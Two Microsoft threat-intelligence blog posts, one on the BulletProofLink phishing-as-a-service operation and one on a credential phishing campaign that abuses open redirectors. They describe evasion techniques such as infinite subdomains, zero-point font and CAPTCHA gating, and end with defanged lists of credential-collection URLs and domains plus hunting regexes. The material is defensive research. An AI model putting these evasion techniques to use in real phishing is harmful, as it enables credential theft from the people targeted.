In researching phishing attacks, we came across a campaign that used a rather high volume of newly created and unique subdomains—over 300,000 in a single run. This investigation led us down a rabbit hole as we unearthed one of the operations that enabled the campaign: a large-scale phishing-as-a-service operation called BulletProofLink, which sells phishing kits, email templates, hosting, and automated services at a relatively low cost.

With over 100 available phishing templates that mimic known brands and services, the BulletProofLink operation is responsible for many of the phishing campaigns that impact enterprises today. BulletProofLink (also referred to as BulletProftLink or Anthrax by its operators in various websites, ads, and other promotional materials) is used by multiple attacker groups in either one-off or monthly subscription-based business models, creating a steady revenue stream for its operators.

This comprehensive research into BulletProofLink sheds a light on phishing-as-a-service operations. In this blog, we expose how effortless it can be for attackers to purchase phishing campaigns and deploy them at scale. We also demonstrate how phishing-as-a-service operations drive the proliferation of phishing techniques like “double theft”, a method in which stolen credentials are sent to both the phishing-as-a-service operator as well as their customers, resulting in monetization on several fronts.

Insights into phishing-as-a-service operations, their infrastructure, and their evolution inform protections against phishing campaigns. The knowledge we gained during this investigation ensures that Microsoft Defender for Office 365 protects customers from the campaigns that the BulletProofLink operation enables. As part of our commitment to improve protection for all, we are sharing these findings so the broader community can build on them and use them to enhance email filtering rules as well as threat detection technologies like sandboxes to better catch these threats.

Understanding phishing kits and phishing-as-a-service (PhaaS)

The persistent onslaught of email-based threats continues to pose a challenge for network defenders because of improvements in how phishing attacks are crafted and distributed. Modern phishing attacks are typically facilitated by a large economy of email and false sign-in templates, code, and other assets. While it was once necessary for attackers to individually build phishing emails and brand-impersonating websites, the phishing landscape has evolved its own service-based economy. Attackers who aim to facilitate phishing attacks may purchase resources and infrastructure from other attacker groups including:

  • Phish kits: Refers to kits that are sold on a one-time sale basis from phishing kit sellers and resellers. These are packaged files, usually a ZIP file, that come with ready-to-use email phishing templates designed to evade detection and are often accompanied by a portal with which to access them. Phish kits allow customers to set up the websites and purchase the domain names. Alternatives to phishing site templates or kits also include templates for the emails themselves, which customers can customize and configure for delivery. One example of a known phish kit is the MIRCBOOT phish kit.
  • Phishing-as-a-service: Similar to ransomware-as-a-service (RaaS), phishing-as-a-service follows the software-as-a-service model, which requires attackers to pay an operator to wholly develop and deploy large portions or complete phishing campaigns from false sign-in page development, website hosting, and credential parsing and redistribution. BulletProofLink is an example of a phishing-as-a-service (PhaaS) operation.

Table showing differences between phishing kits and phishing-as-a-service

Figure 1. Feature comparison between phishing kits and phishing-as-a-service

It’s worth noting that some PhaaS groups may offer the whole deal—from template creation, hosting, and overall orchestration, making it an enticing business model for their clientele. Many phishing service providers offer a hosted scam page solution they call “FUD” Links or “Fully undetected” links, a marketing term used by these operators to try and provide assurance that the links are viable until users click them. These phishing service providers host the links and pages and attackers who pay for these services simply receive the stolen credentials later on. Unlike in certain ransomware operations, attackers do not gain access to devices directly and instead simply receive untested stolen credentials.

Breaking down BulletProofLink services

To understand how PhaaS works in detail, we dug deep into the templates, services, and pricing structure offered by the BulletProofLink operators. According to the group’s About Us web page, the BulletProofLink PhaaS group has been active since 2018 and proudly boasts of their unique services for every “dedicated spammer”.

Screenshot of About Us page on the BulletProofLink website

Figure 2. The BulletProofLink’s ‘About Us’ page provides potential customers an overview of their services.

The operators maintain multiple sites under their aliases, BulletProftLink, BulletProofLink, and Anthrax, including YouTube and Vimeo pages with instructional advertisements as well as promotional materials on forums and other sites. In many of these cases, and in ICQ chat logs posted by the operator, customers refer to the group as the aliases interchangeably.

Screenshot of video tutorials posted by BulletProofLink

Figure 3. Video tutorials posted by the Anthrax Linkers (aka BulletProofLink)

BulletProofLink registration and sign-in pages

BulletProofLink additionally hosts multiple sites, including an online store where they allow their customers to register, sign in, and advertise their hosted service for monthly subscriptions.

Over the course of monitoring this operation, their online store had undergone multiple revisions. The source code for the site’s pages contained references to artifacts elsewhere on the site, which included ICQ chat messages and advertisements. While those references are still present in newer versions, the sign-in page for the monthly subscription site no longer contains service pricing information. In previous versions, the sites alluded to the cost for the operator to host FUD links and return credentials to the purchasing party.

Screenshot of BulletProofLink registration page

Figure 4. BulletProofLink registration page

Just like any other service, the group even boasts of a 10% welcome discount on customers’ orders when they subscribe to their newsletter.

Screenshot of 10% discount offered to those who will sign up for newsletter

Figure 5. BulletProofLink welcome promotion for site visitors’ first order

Credential phishing templates

BulletProofLink operators offer over 100 templates and operate with a highly flexible business model. This business model allows customers to buy the pages and “ship” the emails themselves and control the entire flow of password collection by registering their own landing pages or make full use of the service by using the BulletProofLink’s hosted links as the final site where potential victims key in their credentials.

The templates are designed to evade detection while successfully phishing for credentials, but may vary based on the individual purchasing party. Likewise, the wide variety of templates offered does not guarantee that all BulletProofLink facilitated campaigns will look identical. Instead, the campaigns themselves can be identified with a mixture of phishing page source code, combined with the PHP password processing sites referenced therein, as well as the hosting infrastructure used in their larger-scale campaigns. These password-processing domains correlate back to the operator through hosting, registration, email, and other metadata similarities during domain registration.

The templates offered are related to the phishing pages themselves, so the emails that service them may seem highly disparate and handled by multiple operators.

Services offered: Customer hosting and support

The phishing operators list an array of services on their site along with the corresponding fees. As OSINT Fans noted in their blog, the monthly service costs as much as $800, while other services cost about $50 dollars for a one-time hosting link. We also found that Bitcoin is a common payment method accepted on the BulletProofLink site.

In addition to communicating with customers on site accounts, the operators display various methods of interacting with them, which include Skype, ICQ, forums, and chat rooms. Like a true software business dedicated to their customers, the operators provide customer support services for new and existing customers.

Screenshot of phishing templates being sold by BulletProofLink

Figure 6. Screenshot of the BulletProofLink site, which offers a wide array of phishing services impersonating various legitimate services

Screenshot of BulletProofLink website showing DocuSign services

Figure 7. DocuSign scam page service listed on the BulletProofLink site

The hosting service includes a weekly log shipment to purchasing parties, usually sent manually over ICQ or email. Analysis of individual activity on password-processing replies from the collected infrastructure indicates that the credentials are received on the initial template page and then sent to password-processing sites owned by the operator.

Screenshot of a BulletProofLink ad

Figure 8. An advertisement from BulletProofLink that showcases their weekly log shipment

At the time of this report, BulletProofLink continues to operate active phishing campaigns, with large volumes of redirections to their password-processing links from legitimate web hosting providers. In the next section, we describe on such campaign.

Tracking a BulletProofLink-enabled campaign

As mentioned, we uncovered BulletProofLink while investigating a phishing campaign that used the BulletProofLink phishing kit on either on attacker-controlled sites or sites provided by BulletProofLink as part of their service. The campaign itself was notable for its use of 300,000 subdomains, but our analysis exposed one of many implementations of the BulletProofLink phishing kit:

Diagram showing BulletProofLink-enabled attack chain

Figure 9. End-to-end attack chain of BulletProofLink-enabled phishing campaigns

An interesting aspect of the campaign that drew our attention was its use of a technique we call “infinite subdomain abuse”, which happens when attackers compromise a website’s DNS or when a compromised site is configured with a DNS that allows wildcard subdomains. “Infinite subdomains” allow attackers to use a unique URL for each recipient while only having to purchase or compromise one domain for weeks on end. It is gaining popularity among attackers for the following reasons:

  • It serves as a departure from previous techniques that involved hackers obtaining large sets of single-use domains. To leverage infinite subdomains for use in email links that serve to redirect to a smaller set of final landing pages, the attackers then only need to compromise the DNS of the site, and not the site itself.
  • It allows phishing operators to maximize the unique domains they are able to use by configuring dynamically generated subdomains as prefix to the base domain for each individual email.
  • The creation of unique URLs poses a challenge to mitigation and detection methods that rely solely on exact matching for domains and URLs.

The phishing campaign also impersonated (albeit poorly) the Microsoft logo and branding. The impersonation technique used solid colors for the logo, which may have been done intentionally to bypass detection of the Microsoft logo’s four distinct colors. It is worth noting that later iterations of the campaign have switched to using the four colors in the Microsoft logo.

Screenshot of recent lure used in a BulletProofLink campaign

Figure 10. Phishing lure from a recent credential phishing campaign

These messages also used a technique called zero-point font, which pads the HTML of the message with characters that render as invisible to the user, to obfuscate the email body and attempt to evade detection. This technique is increasingly used by phishers to evade detection.

Screenshot of email and HTML code showing zero-point font technique

Figure 11. HTML showing zero-point font date stuffing in an email

We found that the phishing URL in the email contained Base64-encoded victim information along with an attacker-owned site where the user is meant to be redirected. In this campaign, a single base domain was used for the infinite subdomain technique to initiate the redirects for the campaign, which leveraged multiple secondary sites over several weeks.

Screenshot of encoded URLs and the decoded URL

Figure 12. The format and an example of the phishing URL, which when decoded redirects to the compromised site.

The compromised site redirected to a second domain that hosted the phishing page, which mimicked the Outlook sign-in screen and is generated for each user-specific URL. We found that the page is generated for any number of email addresses entered into the URI, and had no checking mechanisms to guarantee that it wasn’t already used or was related to a live phishing email.

There can be one or more locations to which credentials are sent, but the page employed a few obfuscation techniques to obscure these locations. One attempt to obfuscate the password processing site’s location was by using a function that decodes the location based on calling back to an array of numbers and letters:

Screenshot of a function that decodes the location based on calling back to an array of numbers and letters

We reversed this in Python and found the site that the credentials were being sent to: hxxps://webpicture[.]cc/email-list/finish-unv2[.]php. The pattern “email-list/finish-unv2.php” came in one of these variations: finish-unv2[.]php, finish-unv22[.]php, or finish[.]php. These variations typically used the term “email-list” as well as another file path segment referencing a particular phishing page template, such as OneDrive or SharePoint.

Occasionally, multiple locations were used to send credentials to, including some that could be owned by the purchasing party instead of the operator themselves, which could be called in a separate function. This could be an example of legacy artifacts remaining in final templates, or of double-theft occurring.

Screenshot showing patterns of final site URL

Figure 13. The final site’s format comes in either of these pattern variations

Analyzing these patterns led us to an extensive list of password-capturing URIs detailed in an OSINT Fans blog post about the BulletProofLink phishing service operators. We noticed that they listed patterns similar to the ones we had just observed, enabling us to find the various templates BulletProofLink used, including the phishing email with the fake Microsoft logo discussed earlier.

One of the patterns we noted is that many of the password-processing domains used in the campaigns directly had associated email addresses with “Anthrax”,” BulletProofLink”, “BulletProftLink” or other terms in the certificate registration. The email addresses themselves were not listed identically on every certificate, and were also tied to domains not used exclusively for password-processing, as noted in additional reporting by OSINT Fans.

From then on, we drew even more similarities between the landing pages seen in the infinite subdomain surge campaign we were tracking and the existing in-depth research on the adversaries behind the BulletProofLink operations.

This process ultimately led us to track and expand on the same resources referenced in the OSINT Fans research, as we uncovered even more information about the long-running and large-scale phishing service BulletProofLink. Furthermore, we were able to uncover previous and current password-processing sites in use by the operator, as well as large segments of infrastructure hosted on legitimate hosting sites for this operation’s other components.

“Double theft” as a PhaaS monetization effort

The PhaaS working model as we’ve described it thus far is reminiscent of the ransomware-as-a-service (RaaS) model, which involves double extortion. The extortion method used in ransomware generally involves attackers exfiltrating and posting data publicly, in addition to encrypting them on compromised devices, to put pressure on organizations to pay the ransom. This lets attackers gain multiple ways to assure payment, while the released data can then be weaponized in future attacks by other operators. In a RaaS scenario, the ransomware operator has no obligation to delete the stolen data even if the ransom is already paid.

We have observed this same workflow in the economy of stolen credentials in phishing-as-a-service. With phishing kits, it is trivial for operators to include a secondary location for credentials to be sent to and hope that the purchaser of the phish kit does not alter the code to remove it. This is true for the BulletProofLink phishing kit, and in cases where the attackers using the service received credentials and logs at the end of a week instead of conducting campaigns themselves, the PhaaS operator maintained control of all credentials they resell.

In both ransomware and phishing, the operators supplying resources to facilitate attacks maximize monetization by assuring stolen data, access, and credentials are put to use in as many ways as possible. Additionally, victims’ credentials also likely to end up in the underground economy.

For a relatively simple service, the return of investment offers a considerable motivation as far as the email threat landscape goes.

How Microsoft Defender for Office 365 defends against PhaaS-driven phishing attacks

Investigating specific email campaigns allows us to ensure protections against particular attacks as well as similar attacks that use the same techniques, such as the infinite subdomain abuse, brand impersonation, zero-point font obfuscation, and victim-specific URI used in the campaign discussed in this blog. By studying phishing-as-a-service operations, we are able to scale and expand the coverage of these protections to multiple campaigns that use the services of these operations.

In the case of BulletProofLink, our intelligence on the unique phishing kits, phishing services, and other components of phishing attacks allows us to ensure protection against the many phishing campaigns this operation enables. Microsoft Defender for Office 365—which uses machine learning, heuristics, and an advance detonation technology to analyze emails, attachments, URLs, and landing pages in real time—recognizes the BulletProofLink phishing kit that serves the false sign-in pages and detects the associated emails and URLs.

In addition, based on our research into BulletProofLink and other PhaaS operations, we observed that numerous phishing kits leverage the code and behaviors of existing kits, such as those sold by BulletProofLink. Any kit that attempts to leverage similar techniques, or stitch together code from multiple kits can similarly be detected and remediated before the user receives the email or engages with the content.

With Microsoft 365 Defender, we’re able to further expand that protection, for example, by blocking of phishing websites and other malicious URLs and domains in the browser through  Microsoft Defender SmartScreen, as well as the detection of suspicious and malicious behavior on endpoints. Advanced hunting capabilities allow customers to search through key metadata fields on mailflow for the indicators listed in this blog and other anomalies. Email threat data is correlated with signals from endpoints and other domains, providing even richer intelligence and expanding investigation capabilities.

To build resilience against phishing attacks in general, organizations can use anti-phishing policies to enable mailbox intelligence settings, as well as configure impersonation protection settings for specific messages and sender domains. Enabling SafeLinks ensures real-time protection by scanning at time of delivery and at time of click.

In addition to taking full advantage of the tools available in Microsoft Defender for Office 365, administrators can further strengthen defenses against the threat of phishing by securing the Azure AD identity infrastructure. We strongly recommend enabling multifactor authentication and blocking sign-in attempts from legacy authentication.

Learn how you can stop credential phishing and other email threats through comprehensive, industry-leading protection with Microsoft Defender for Office 365.

 

Microsoft 365 Defender Threat Intelligence Team

 

Indicators of compromise

Password-processing URLs

  • hxxps://apidatacss[.]com/finish-unv22[.]php
  • hxxps://ses-smtp[.]com/email-list/office19999999/finish[.]php
  • hxxps:// ses-smtp[.]com/email-list/onedrive25/finish[.]php
  • hxxps:// ses-smtp[.]com/email-list/office365nw/finish[.]php
  • hxxps://smtpro101[.]com/email-list/onedrive25/finish[.]php
  • hxxps://smtpro101[.]com/email-list/office19999999/finish[.]php
  • hxxps://plutosmto[.]com/email-list/office365nw/finish[.]php
  • hxxps://smtptemp[.].site/email-list/office365nw/finish[.]php
  • hxxps://trasactionsmtp[.]com/email-list/finish-unv2[.]php
  • hxxps://smtptemp[.]site/email-list/office365nw/finish-unv22[.]php
  • hxxps://apidatacss:com/finish-unv22[.]php
  • hxxps://smtptemp.site/email-list/otlk55/finish[.]php
  • hxxps://smtptemp.site/email-list/onedrive25/finish[.]php
  • hxxps://plutosmto[.]com/email-list/kumar/finish[.]php
  • hxxps://laptopdata.xyz/email-list/office365nw/finish[.]php
  • hxxps://jupitersmt[.]com/email-list/office365nw/finish[.]php
  • hxxps://plutosmto[.]com/email-list/onedrive25/finish[.]php
  • hxxps://plutosmto[.]com/email-list/sharepointbuisness/finish[.]php
  • hxxps://ghostsmtp[.]com/email-list/sharepoint/finish[.]php
  • hxxps://jupitersmt[.]com/email-list/otlk/finish[.]php
  • hxxps://earthsmtp[.]com/email-list/onedrive25/finish[.]php
  • hxxps://earthsmtp[.]com/email-list/office365nw/finish[.]php
  • hxxps://trasactionsmtp[.]com/email-list/defaultcustomers/johnphilips002021/finish[.]php
  • hxxps://trasactionsmtp[.]com/email-list/office365nw/finish[.]php
  • hxxps://trasactionsmtp[.]com/email-list/universalmail/finish[.]php
  • hxxps://trasactionsmtp[.]com/email-list/onedrive25/finish[.]php
  • hxxps://moneysmtp[.]com/email-list/office365nw/finish[.]php
  • hxxps://moneysmtp[.]com/email-list/otlk/finish[.]php
  • hxxps://moneysmtp[.]com/hxxp://moneysmtp[.]com/email-list/office365nw/finish[.]php
  • hxxps://feesmtp[.]com/email-list/office365rd40/finish[.]php
  • hxxps://feesmtp[.]com/email-list/onedrive25/finish[.]php
  • hxxps://Failedghostsmtp[.]com/email-list/sharepoint/finish[.]php
  • hxxps://bomohsmtp[.]com/email-list/office365-21/finish[.]php
  • hxxps://bomohsmtp[.]com/email-list/onedrive25/finish[.]php
  • hxxps://foxsmtp[.]com/email-list/onedrive25/finish[.]php
  • hxxps://dasmtp[.]com/email-list/dropboxoffice1/finish[.]php
  • hxxps://rosmtp[.]com/email-list/onedrive23/finish[.]php
  • hxxps://ghostsmtp[.]com/email-list/adobe20/finish[.]php
  • hxxps://josmtp[.]com/email-list/onedrive23/finish[.]php
  • hxxps://ghostsmtp[.]com:443/email-list/onedrive23/finish[.]php
  • hxxps://ghostsmtp[.]com/email-list/onedrive23/finish[.]php
  • hxxps://winsmtp[.]com/email-list/excel/finish[.]php
  • hxxps://linuxsmtp[.]com/email-list/adobe20/finish[.]php?phishing-processor
  • hxxps://gpxsmtp[.]com/email-list/office1/finish[.]php?phishing-processor
  • hxxps://gpxsmtp[.]com/email-list/onedrive23/finish[.]php?phishing-processor
  • hxxps://gpxsmtp[.]com/email-list/excel5/finish[.]php
  • hxxps://gpxsmtp[.]com/email-list/adobe3/finish[.]php
  • hxxps://gpxsmtp[.]com/email-list/office1/finish[.]php
  • hxxps://gpxsmtp[.]com/email-list/onedrive23/finish[.]php
  • hxxps://panelsmtp[.]com/email-list/onedrive-ar/finish[.]php
  • hxxps://mexsmtp[.]com/email-list/onedrive23/finish[.]php?phishing-processor
  • hxxps://racksmtp[.]com/email-list/domain-au1/finish[.]php
  • hxxps://racksmtp[.]com/email-list/finish[.]php
  • hxxps://racksmtp[.]com/email-list/sharepoint/finish[.]php
  • hxxps://mainsmtp[.]com/email-list/onedrive23/finish[.]php
  • hxxps://prvtsmtp[.]com/email-list/onedrive23/finish[.]php?i-am-a-phishing-processor
  • hxxps://prvtsmtp[.]com/email-list/onedrive23/finish[.]php?this-is-a-phishing-processor
  • hxxps://prvtsmtp[.]com/email-list/office1/finish[.]php
  • hxxps://prvtsmtp[.]com/email-list/onedrive23/finish[.]php
  • hxxps://apiserverdata1[.]com/email-list/office1/finish[.]php
  • hxxps://webpicture.cc/email-list/excel/finish[.]php
  • hxxps://webpicture.cc/email-list/office1/finish[.]php?this-is-a=phishing-processor
  • hxxps://valvadi101[.]com/email-list/office1/finish[.]php
  • hxxps://moneysmtp[.]com/email-list/finish-unv2[.]php
  • hxxps://foxsmtp[.]com/email-list/finish-unv2[.]php
  • hxxps://bomohsmtp[.]com/email-list/finish-unv2[.]php
  • hxxps://rosmtp[.]com/email-list/finish-unv2[.]php
  • hxxps://linuxsmtp[.]com/email-list/finish-unv2[.]php?phishing-processor
  • hxxps://voksmtp[.]com/email-list/finish-unv2[.]php?phishing-processor
  • hxxps://gpxsmtp[.]com/email-list/finish-unv2[.]php?phishing-processor
  • hxxps://gpxsmtp[.]com/email-list/finish-unv2[.]php
  • hxxps://webpicture.cc/email-list/finish-unv2[.]php
  • hxxps://Faileduebpicture.cc/email-list/finish-unv2[.]php
  • hxxps://Failedsendapidata[.]com/email-list/finish-unv2[.]php
  • hxxps://webpicture.cc/email-list/finish-unv2[.]php?phishing-processor
  • hxxps://prvtsmtp[.]com/email-list/finish-unv2[.]php
  • hxxps://webpicture.cc/email-list/finish-unv2.ph
  • hxxps://apiserverdata1[.]com/email-list/finish-unv2[.]php
  • hxxps://sendapidata[.]com/email-list/finish-unv2[.]php

Password-processing domains:

  • hxxps://apidatacss[.]com
  • hxxps://apiserverdata1[.]com
  • hxxps://baller[.]top
  • hxxps://datacenter01.us
  • hxxps://f1smtp[.]com
  • hxxps://ghostsmtp[.]com
  • hxxps://gpxsmtp[.]com
  • hxxps://gurl101[.]services
  • hxxps://hostprivate[.]us
  • hxxps://josmtp[.]com
  • hxxps://link101[.]bid
  • hxxps://linuxsmtp[.]com
  • hxxps://migration101[.]us
  • hxxps://panelsmtp[.]com
  • hxxps://racksmtp[.]com
  • hxxps://rosmtp[.]com
  • hxxps://rxasmtp[.]com
  • hxxps://thegreenmy87[.]com
  • hxxps://vitme[.]bid
  • hxxps://voksmtp[.]com
  • hxxps://winsmtp[.]com
  • hxxps://trasactionsmtp[.]com
  • hxxps://moneysmtp[.]com
  • hxxps://foxsmtp[.]com
  • hxxps://bomohsmtp[.]com
  • hxxps://webpicture[.]cc
  • hxxps://Faileduebpicture[.]cc
  • hxxps://Failedsendapidata[.]com
  • hxxps://prvtsmtp[.]com
  • hxxps://sendapidata[.]com
  • hxxps://smtptemp.site
  • hxxps://plutosmto[.]com
  • hxxps://laptopdata[.]xyz
  • hxxps://jupitersmt[.]com
  • hxxps://earthsmtp[.]com
  • hxxps://feesmtp[.]com
  • hxxps://Failedghostsmtp[.]com
  • hxxps://dasmtp[.]com
  • hxxps://mexsmtp[.]com
  • hxxps://mainsmtp[.]com
  • hxxps://valvadi101[.]com
  • hxxps://ses-smtp[.]com

 

The post Catching the big fish: Analyzing a large-scale phishing-as-a-service operation appeared first on Microsoft Security Blog.

Widespread credential phishing campaign abuses open redirector links

August 26th, 2021 No comments

Microsoft has been actively tracking a widespread credential phishing campaign using open redirector links. Attackers combine these links with social engineering baits that impersonate well-known productivity tools and services to lure users into clicking. Doing so leads to a series of redirections—including a CAPTCHA verification page that adds a sense of legitimacy and attempts to evade some automated analysis systems—before taking the user to a fake sign-in page. This ultimately leads to credential compromise, which opens the user and their organization to other attacks.

The use of open redirects in email communications is common among organizations for various reasons. For example, sales and marketing campaigns use this feature to lead customers to a desired landing web page and track click rates and other metrics. However, attackers could abuse open redirects to link to a URL in a trusted domain and embed the eventual final malicious URL as a parameter. Such abuse may prevent users and security solutions from quickly recognizing possible malicious intent.

For instance, users trained to hover on links and inspect for malicious artifacts in emails may still see a domain they trust and thus click it. Likewise, traditional email gateway solutions may inadvertently allow emails from this campaign to pass through because their settings have been trained to recognize the primary URL without necessarily checking the malicious parameters hiding in plain sight.

Diagram showing attack chain of phishing campaigns that use open redirect links

Figure 1. Attack chain for the open redirect phishing campaign

This phishing campaign is also notable for its use of a wide variety of domains for its sender infrastructure—another attempt to evade detection. These include free email domains from numerous country code top-level domains (ccTLDs), compromised legitimate domains, and attacker-owned domain generated algorithm (DGA) domains. As of this writing, we have observed at least 350 unique phishing domains used for this campaign. This not only shows the scale with which this attack is being conducted, but it also demonstrates how much the attackers are investing in it, indicating potentially significant payoffs.

Today’s email threats rely on three things to be effective: a convincing social engineering lure, a well-crafted detection evasion technique, and a durable infrastructure to carry out an attack. This phishing campaign exemplifies the perfect storm of these elements in its attempt to steal credentials and ultimately infiltrate a network. And given that 91% of all cyberattacks originate with email, Organizations must therefore have a security solution that will provide them multilayered defense against these types of attacks.

Microsoft Defender for Office 365 detects these emails and prevents them from being delivered to user inboxes using multiple layers of dynamic protection technologies, including a built-in sandbox that examines and detonates all the open redirector links in the messages, even in cases where the landing page requires CAPTCHA verification. This ensures that even the embedded malicious URLs are detected and blocked. Microsoft Defender for Office 365 is backed by Microsoft experts who enrich the threat intelligence that feeds into our solutions through expert monitoring of email campaigns.

Attack analysis: Credential phishing via open redirector links

Credential phishing emails represent an extremely prevalent way for threat actors to gain a foothold in a network. The use of open redirects from legitimate domains is far from new, and actors continue to abuse its ability to overcome common precautions.

Phishing continues to grow as a dominant attack vector with the goal of harvesting user credentials. From our 2020 Digital Defense Report, we blocked over 13 billion malicious and suspicious mails in the previous year, with more than 1 billion of those emails classified as URL-based phishing threats.

In this campaign, we noticed that the emails seemed to follow a general pattern that displayed all the email content in a box with a large button that led to credential harvesting pages when clicked. The subject lines for the emails varied depending on the tool they impersonated. In general, we saw that the subject lines contained the recipient’s domain and a timestamp as shown in the examples below:

  • [Recipient username] 1 New Notification
  • Report Status for [Recipient Domain Name] at [Date and Time]
  • Zoom Meeting for [Recipient Domain Name] at [Date and Time]
  • Status for [Recipient Domain Name] at [Date and Time]
  • Password Notification for [Recipient Domain Name] at [Date and Time]
  • [Recipient username] eNotification

Screenshot of email that uses open redirect link

Figure 2. Sample phishing email masquerading as an Office 365 notification

Once recipients hover their cursor over the link or button in the email, they are shown the full URL. However, since the actors set up open redirect links using a legitimate service, users see a legitimate domain name that is likely associated with a company they know and trust. We believe that attackers abuse this open and reputable platform to attempt evading detection while redirecting potential victims to phishing sites.

Screenshot of email showing open redirector link when mouse is hovered the link in the email

Figure 3. Hover tip showing an open redirect link with a legitimate domain and phishing link in the URL parameters

The final domains used in the campaigns observed during this period mostly follow a specific domain-generation algorithm (DGA) pattern and use .xyz and .club TLDs. The “Re-view invitation” button in Figure 3 points to a URL with a trusted domain followed by parameters, with the actor-controlled domain (c-hi[.]xyz) hidden in plain sight.

Figure 4. The actor-controlled domain uses a DGA pattern and a .XYZ top-level domain

In August, we detected a fresh spam run from this campaign that used a slightly updated Microsoft-spoofing lure and redirect URL but leveraged the same infrastructure and redirection chain.

Figure 5. Sample phishing email from a recent spam run from this phishing campaign

These crafted URLs are made possible by open redirection services currently in use by legitimate organizations. Such redirection services typically allow organizations to send out campaign emails with links that redirect to secondary domains from their own domains. For example, a hotel might use open redirects to take email recipients to a third-party booking website, while still using their primary domain in links embedded in their campaign emails.

Attackers abuse this functionality by redirecting to their own malicious infrastructure, while still maintaining the legitimate domain in the full URL. The organizations whose open redirects are being abused are possibly unaware that this is even occurring.

Redirecting to phishing pages

Users who clicked one of the crafted redirect links are sent to a page in attacker-owned infrastructure. These pages used Google reCAPTCHA services to possibly evade attempts at dynamically scanning and checking the contents of the page, preventing some analysis systems from advancing to the actual phishing page.

Screenshot of landing page with CAPTCHA challenge

Figure 6. reCAPTCHA service used by phishing page

Upon completion of the CAPTCHA verification, the user is shown a site that impersonates a legitimate service, such as Microsoft Office 365, which asks the user for their password. The site is prepopulated with the recipient’s email address to add legitimacy to the request. This technique leverages familiar single sign-on (SSO) behavior to trick users into keying in corporate credentials or other credentials associated with the email address.

To do this, attackers send unique URLs to each recipient with PHP parameters that cause tailored information to render in the phishing page. In some instances, phishing pages are specially crafted to include company logos and other branding tied to the recipient’s domain.

Screenshnot of phishing page

Figure 7. Fake sign-in page prefilled with the recipient email address alongside a fake error message prompting users to re-enter their passwords

If the user enters their password, the page refreshes and displays an error message stating that the page timed out or the password was incorrect and that they must enter their password again. This is likely done to get the user to enter their password twice, allowing attackers to ensure they obtain the correct password.

Once the user enters their password a second time, the page directs to a legitimate Sophos website that claims the email message has been released. This adds another layer of false legitimacy to the phishing campaign.

Screenshot of legitimate website that phishing page redirects to

Figure 8. Legitimate Sophos page displayed after users re-enter their passwords

Tracking attacker-controlled domains

Some of the domains used this campaign include the following:

  • c-tl[.]xyz
  • a-cl[.]xyz
  • j-on[.]xyz
  • p-at[.]club
  • i-at[.]club
  • f-io[.]online

For the observed campaigns, the sender infrastructure was fairly unique and notable as the actors used a wide variety of sender domains, with most of the domains having at least one of the following characteristics:

  • Free email domains
  • Compromised legitimate domains
  • Domains ending in .co.jp
  • Attacker-owned DGA domains

Many of the final domains hosting the phishing pages follow a specific DGA pattern:

  • [letter]-[letter][letter].xyz
  • [letter]-[letter][letter].club

The free email domains span a wide variety of ccTLDs, such as:

  • de
  • com.mx
  • com.au
  • ca

The attacker-owned DGA domains follow a few distinct patterns, including:

  • [word or string of characters]-[word][number], incrementing by one, for example: masihtidur-shoes08[.]com
  • [number][word or string of characters]-[number], incrementing by one, for example: 23moesian-17[.]com
  • [word][word][number], incrementing by one, for example: notoficationdeliveryamazon10[.]com
  • [word or letters][number]-[number], incrementing by one, for example: dak12shub-3[.]com

While these are the most prevalent patterns observed by Microsoft security researchers, over 350 unique domains have been observed during these campaigns.

How Microsoft Defender for Office 365 protects against modern email threats

The abuse of open redirectors represents an ongoing threat that Microsoft experts constantly monitor, along with other threat trends and attacker techniques used in attacks today. Microsoft’s breadth of visibility into threats combined with our deep understanding of how attackers operate will continue to inform the advanced protection delivered by Microsoft Defender for Office 365  against email-based attacks.

For mitigations against the abuse of open redirector links via known third-party platforms or services, users are advised to follow the recommended best practices of their service providers, such as updating to the latest software version, if applicable, to prevent their domains from being abused in future phishing attempts.

Microsoft Defender for Office 365 protects customers from this threat by leverages its deep visibility into email threats and advanced detection technologies powered by AI and machine learning. We strongly recommend that organizations configure recommended settings in Microsoft Defender for Office 365, such as applying anti-phishing, Safe Links, and Safe Attachments policies. We also recommend installing the Report Message add-in for Outlook to enable users to report suspicious messages to their security teams and optionally to Microsoft.

Attack simulation lets organizations run realistic, yet safe, simulated phishing and password attack campaigns in your organization. These simulated attacks can help identify and find vulnerable users before a real attack makes a real impact.

Investigation capabilities in Microsoft Defender 365 allows organizations to respond phishing and other email-based attacks. Microsoft 365 Defender correlates signals from emails and other domains to deliver coordinated defense.  Microsoft Defender for Endpoint blocks malicious files and other malware as well as malicious behavior that result from initial access via email. Microsoft Defender SmartScreen integrates with Microsoft Edge to block malicious websites, including phishing sites, scam sites, and other malicious sites, while Network protection blocks connections to  malicious domains and IP addresses.

Learn how you can stop credential phishing and other email threats through comprehensive, industry-leading protection with Microsoft Defender for Office 365.

 

 Microsoft 365 Defender Threat Intelligence Team

 

Advanced hunting queries

To locate possible credential phishing activity, run the following advanced hunting queries in Microsoft 365 Defender.

Open redirect URLs in t-dot format

Find URLs in emails with a leading “t”, indicating possible open redirect URLs. Note: the use of a redirector URL does not necessitate malicious behavior. You must verify whether the emails surfaced via this AHQ are legitimate or malicious.

EmailUrlInfo
| where Url matches regex @"s?\:\/\/(?:www\.)?t\.(?:[\w\-\.]+\/+)+(?:r|redirect)\/?\?"

Open redirect URLs pointing to attacker infrastructure

Find URLs in emails possibly crafted to redirect to attacker-controlled URLs.

EmailUrlInfo
//This regex narrows in on emails that contain the known malicious domain pattern in the URL from the most recent campaigns
| where Url matches regex @"^[a-zA-Z]\-[a-zA-Z]{2}\.(xyz|club|shop|online)"

Indicators of compromise

Following is a list of domains that match the DGA pattern used in sender addresses in this and other malicious campaigns. Note that these have not all been observed in mail flow related to this campaign.

masihtidur-shoes08[.]com masihtidur-shoes07[.]com masihtidur-shoes04[.]com
masihtidur-shoes02[.]com masihtidur-shoes01[.]com wixclwardwual-updates9[.]com
wixclwardwual-updates8[.]com wixclwardwual-updates7[.]com wixclwardwual-updates6[.]com
wixclwardwual-updates5[.]com wixclwardwual-updates10[.]com wixclwardwual-updates1[.]com
zxcsaxb-good8[.]com zxcsaxb-good6[.]com zxcsaxb-good5[.]com
zxcsaxb-good4[.]com zxcsaxb-good3[.]com zxcsaxb-good10[.]com
trashxn-euyr9[.]com trashxn-euyr7[.]com trashxn-euyr6[.]com
trashxn-euyr5[.]com trashxn-euyr3[.]com trashxn-euyr20[.]com
trashxn-euyr2[.]com trashxn-euyr19[.]com trashxn-euyr18[.]com
trashxn-euyr17[.]com trashxn-euyr16[.]com trashxn-euyr15[.]com
